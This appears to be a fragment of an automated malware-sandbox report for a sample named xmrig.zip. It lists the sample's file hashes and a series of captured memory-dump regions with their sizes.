5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip
Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/592-0-0x00007FFA9C3B3000-0x00007FFA9C3B4000-memory.dmp

Filesize
4KB

Download
memory/592-25-0x00007FFA9C3B0000-0x00007FFA9CD9C000-memory.dmp

Filesize
9.9MB

Download
memory/592-10-0x0000020798940000-0x00000207989B6000-memory.dmp

Filesize
472KB

Download
memory/592-9-0x00007FFA9C3B0000-0x00007FFA9CD9C000-memory.dmp

Filesize
9.9MB

Download
memory/592-6-0x00007FFA9C3B0000-0x00007FFA9CD9C000-memory.dmp

Filesize
9.9MB

Download
memory/592-5-0x0000020798790000-0x00000207987B2000-memory.dmp

Filesize
136KB

Download
memory/592-412-0x00007FFA9C3B0000-0x00007FFA9CD9C000-memory.dmp

Filesize
9.9MB

Download
memory/752-88-0x000002BD77940000-0x000002BD77952000-memory.dmp

Filesize
72KB

Download
memory/752-87-0x000002BD772B0000-0x000002BD772BA000-memory.dmp

Filesize
40KB

Download
memory/932-131-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/932-130-0x00000000001D0000-0x00000000001F0000-memory.dmp

Filesize
128KB

Download
memory/5084-414-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/5084-413-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/5084-415-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/5084-416-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/5084-417-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/5084-418-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/5084-419-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/5084-420-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/5084-421-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/5084-422-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/5084-423-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/5084-424-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/5084-425-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download